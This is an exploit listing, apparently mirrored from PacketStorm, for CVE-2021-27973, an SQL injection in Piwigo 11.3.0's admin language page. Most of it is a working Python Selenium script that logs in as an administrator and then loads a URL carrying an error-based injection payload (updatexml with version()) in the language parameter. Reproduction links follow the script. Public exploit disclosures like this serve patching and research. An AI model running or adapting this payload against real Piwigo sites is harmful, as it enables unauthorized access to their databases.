Share
## https://sploitus.com/exploit?id=PACKETSTORM:162404
# Exploit Title: SQL injection in language parameter to admin.php?page=languages.on Piwigo 11.3.0  
# Author: @nu11secur1ty  
# Testing and Debugging: nu11secur1ty  
# Date: 04.30.2021  
# Vendor: https://piwigo.org/  
# Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0  
# CVE: CVE-2021-27973  
  
[+] Exploit Source:  
  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# Debug: @nu11secur1ty  
# CVE-2021-27973  
  
from selenium import webdriver  
import time  
  
  
#enter the link to the website you want to automate login.  
website_link="http://192.168.1.3/piwigo/"  
  
#enter your login username  
username="admin"  
  
#enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="username"  
  
#enter the element for password input field  
element_for_password="password"  
  
#enter the element for submit button  
element_for_submit="login"  
  
print("Loading... ;)")  
time.sleep(1)  
browser = webdriver.Chrome()  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Languages Exploit  
time.sleep(5)  
browser.get(("  
http://192.168.1.3/piwigo/admin.php?page=languages&language=TR_CN%27%20or%20updatexml(1%2Cconcat(0x7e%2C(version()))%2C0)%20or%20%27&action=activate  
"))  
  
print("The payload for category Languages is deployed...\n")  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("Some error occured :(")  
  
---------------------------------  
  
# Exploit Title: SQL injection in language parameter to  
admin.php?page=languages.on Piwigo 11.3.0  
# Date: 04.30.2021s  
# Exploit Authotr idea: @nu11secur1ty  
# Exploit Debugging: @nu11secur1ty  
# Vendor Homepage: https://piwigo.org/  
# Software Link: https://github.com/Piwigo/Piwigo/releases/tag/11.3.0  
  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-27973  
# more: https://www.nu11secur1ty.com/2021/04/cve-2021-27973.html